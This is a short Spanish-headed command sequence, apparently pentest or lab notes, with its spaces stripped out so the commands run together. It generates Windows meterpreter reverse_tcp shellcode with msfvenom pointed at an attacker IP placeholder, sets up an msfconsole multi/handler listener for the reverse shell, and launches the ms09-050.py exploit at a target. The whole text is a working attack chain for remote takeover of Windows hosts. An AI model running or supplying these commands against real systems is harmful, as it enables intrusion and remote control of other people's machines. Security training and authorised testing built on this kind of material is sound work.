# Generación de shellcodemsfvenom-pwindows/meterpreter/reverse_tcpLHOST=<attacker-IP-address>LPORT=<listen-port>EXITFUNC=thread-fpython--var-nameshell# Configuración de listener (multi/handler) de reverse shell msfconsoleusemulti/handlersetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST<attacker-IP-address>setLPORT<listen-port>run-j# Exploitpython2ms09-050.py<target>